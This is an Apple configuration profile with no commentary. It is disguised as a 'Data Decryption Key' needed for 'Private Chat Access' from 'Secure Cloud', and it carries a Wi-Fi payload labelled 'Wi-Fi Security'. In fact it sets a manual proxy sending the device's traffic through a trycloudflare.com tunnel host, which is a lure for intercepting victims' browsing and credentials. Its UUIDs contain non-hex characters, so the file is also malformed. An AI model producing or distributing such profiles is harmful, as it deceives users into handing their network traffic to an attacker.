<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>PayloadDescription</key>
            <string>Configures Wi-Fi settings for secure access</string>
            <key>PayloadDisplayName</key>
            <string>Wi-Fi Security</string>
            <key>PayloadIdentifier</key>
            <string>com.apple.wifi.managed.1</string>
            <key>PayloadType</key>
            <string>com.apple.wifi.managed</string>
            <key>PayloadUUID</key>
            <string>A1B2C3D4-E5F6-4G7H-8I9J-K0L1M2N3O4P5</string>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>ProxyType</key>
            <string>Manual</string>
            <key>ProxyServer</key>
            <string>bb8e7d52-15c4-495b-9468-91c04224bd1a.trycloudflare.com</string>
            <key>ProxyPort</key>
            <integer>80</integer>
        </dict>
    </array>
    <key>PayloadDescription</key>
    <string>Verification Required for Private Chat Access</string>
    <key>PayloadDisplayName</key>
    <string>Data Decryption Key</string>
    <key>PayloadIdentifier</key>
    <string>com.hadima.verify</string>
    <key>PayloadOrganization</key>
    <string>Secure Cloud</string>
    <key>PayloadType</key>
    <string>Configuration</string>
    <key>PayloadUUID</key>
    <string>Z9Y8X7W6-V5U4-T3S2-R1Q0-P9O8N7M6L5K4</string>
    <key>PayloadVersion</key>
    <integer>1</integer>
</dict>
</plist>
